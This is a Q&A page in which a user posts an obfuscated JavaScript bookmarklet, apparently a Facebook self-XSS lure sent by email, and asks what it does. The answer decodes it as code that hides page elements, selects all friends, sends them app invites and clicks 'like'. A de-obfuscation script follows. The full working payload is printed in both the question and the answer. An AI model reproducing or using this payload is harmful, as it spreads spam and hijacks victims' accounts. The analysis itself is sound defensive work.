
What does this code do

Tags:

javascript

OK, someone who happens to be a good friend of mine has been sending me some odd emails lately, one of which was a link to a page that asks you to copy and paste this into the address bar in your browser and then execute it ...

javascript:(function(){a='app125879300771588_jop';b='app125879300771588_jode';ifc='app125879300771588_ifc';ifo='app125879300771588_ifo';mw='app125879300771588_mwrapper';var _0xc100=["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x69\x64\x64\x65\x6E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x6C\x75\x65","\x63\x6C\x69\x63\x6B","\x73\x75\x67\x67\x65\x73\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67","\x6C\x69\x6B\x65\x6D\x65"];d=document;d[_0xc100[2]](mw)[_0xc100[1]][_0xc100[0]]=_0xc100[3];d[_0xc100[2]](a)[_0xc100[4]]=d[_0xc100[2]](b)[_0xc100[5]];d[_0xc100[2]](_0xc100[7])[_0xc100[6]]();setTimeout(function (){fs[_0xc100[8]]();} ,5000);setTimeout(function (){SocialGraphManager[_0xc100[11]](_0xc100[9],_0xc100[10]);} ,5000);setTimeout(function (){d[_0xc100[2]](_0xc100[12])[_0xc100[6]]();d[_0xc100[2]](ifo)[_0xc100[4]]=d[_0xc100[2]](ifc)[_0xc100[5]];} ,5000);})();

Not being totally with it when it comes to low-level programming, I'm curious as to what the email is asking here ...

PLEASE DO NOT RUN THIS CODE UNLESS YOU ARE HAPPY THAT IT WILL NOT BREAK ANYTHING.

But ... Could someone tell me what it does?

War asked May 24 '10 10:05



1 Answer

I haven't completely decoded the code, but here are a couple of hints about it.

The variable _0xc100 defines an array of strings. The characters are encoded as hexadecimal, so it's more difficult to read them. So, for instance, \x76 equals "v".

You can safely alert(_0xc100); to see it in plain text.

var _0xc100 = ["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79", 
      "\x73\x74\x79\x6C\x65", 
      "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64",
      "\x68\x69\x64\x64\x65\x6E",
      "\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C",
      "\x76\x61\x6C\x75\x65",
      "\x63\x6C\x69\x63\x6B",
      "\x73\x75\x67\x67\x65\x73\x74",
      "\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C",
      "\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D",
      "\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70",
      "\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67",
      "\x6C\x69\x6B\x65\x6D\x65"];

translates to an array containing these keywords

visibility, style, getElementById, hidden, innerHTML, value, click, suggest, select_all,
sgm_invite_form, /ajax/social_graph/invite_dialog.php, submitDialog, likeme

Now, the following statements (DON'T EXECUTE THOSE) use these keywords to actually execute functions.

For instance:

d[_0xc100[2]](mw)[_0xc100[1]][_0xc100[0]] = _0xc100[3];

is equivalent to (d is defined as document and mw is defined at the top)

document.getElementById("app125879300771588_mwrapper").style.visibility = "hidden";

which hides an element called app125879300771588_mwrapper

The following instructions give

document.getElementById("app125879300771588_jop").innerHTML = document.getElementById("app125879300771588_jode").value;

which copies the content of app125879300771588_jop into app125879300771588_jode

and

document.getElementById("suggest").click();

which I guess clicks some "suggest" button.

Finally, it sets 3 setTimeout functions, to execute 3 commands after 5 seconds (the 5000)

They translate to

setTimeout(function () {
    // The original statement is fs[_0xc100[8]](), i.e. a method call on fs
    fs.select_all();
}, 5000);

Which I assume selects all your friends...

setTimeout(function () {
    SocialGraphManager.submitDialog("sgm_invite_form", "/ajax/social_graph/invite_dialog.php");
}, 5000);

... send them invites

setTimeout(function () {
    document.getElementById("likeme").click();
    document.getElementById("app125879300771588_ifo").innerHTML =
        document.getElementById("app125879300771588_ifc").value;
}, 5000);

... and presses a like button

Note that I don't use Facebook, and I don't know the ins and outs of it, but I guess it's pretty clear that this code is malicious.

nico answered Oct 01 '22 09:10
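The manual substitution walked through in the answer above can be done mechanically, treating the payload purely as text so that nothing in it is ever executed. This is an added example, not part of the original question or answer: the function names and the shortened SAMPLE (the first four table entries and the first statement of the bookmarklet) are constructed here, and it assumes the string table contains no "]" character.

```javascript
// Constructed sample: first four table entries and first statement of the quoted
// bookmarklet. String.raw keeps the \xNN escapes as literal text, as received.
const SAMPLE = String.raw`var _0xc100=["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x69\x64\x64\x65\x6E"];d=document;d[_0xc100[2]](mw)[_0xc100[1]][_0xc100[0]]=_0xc100[3];`;

// Turn textual \xNN escapes into the characters they stand for.
function decodeHexEscapes(s) {
  return s.replace(/\\x([0-9A-Fa-f]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Find "var <name>=[...]" in the source text and return its decoded strings.
function extractStringTable(src, name) {
  const m = src.match(new RegExp('var\\s+' + name + '\\s*=\\s*\\[([^\\]]*)\\]'));
  if (!m) throw new Error('string table ' + name + ' not found');
  const table = [];
  const literal = /"((?:[^"\\]|\\.)*)"/g;
  let item;
  while ((item = literal.exec(m[1])) !== null) table.push(decodeHexEscapes(item[1]));
  return table;
}

// Replace every <name>[n] lookup with the string it refers to. No eval involved.
function deobfuscate(src, name) {
  const table = extractStringTable(src, name);
  const isIdent = (s) => /^[A-Za-z_$][\w$]*$/.test(s);
  const ref = name + '\\[(\\d+)\\]';
  const lookup = (i) => {
    if (i >= table.length) throw new Error('index ' + i + ' is outside the string table');
    return table[i];
  };
  // Drop the table declaration; what remains are the statements that use it.
  let body = src.replace(new RegExp('var\\s+' + name + '\\s*=\\s*\\[[^\\]]*\\];?'), '');
  // obj[<name>[n]] is a property access: use dot notation when the string allows it.
  body = body.replace(new RegExp('\\[' + ref + '\\]', 'g'), (_, i) => {
    const s = lookup(Number(i));
    return isIdent(s) ? '.' + s : '[' + JSON.stringify(s) + ']';
  });
  // Any remaining bare <name>[n] is a plain string value.
  return body.replace(new RegExp(ref, 'g'), (_, i) => JSON.stringify(lookup(Number(i))));
}

console.log(deobfuscate(SAMPLE, '_0xc100'));
```

Run under Node.js with the full payload saved as text, this prints readable statements that can be reviewed without pasting anything into a browser.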
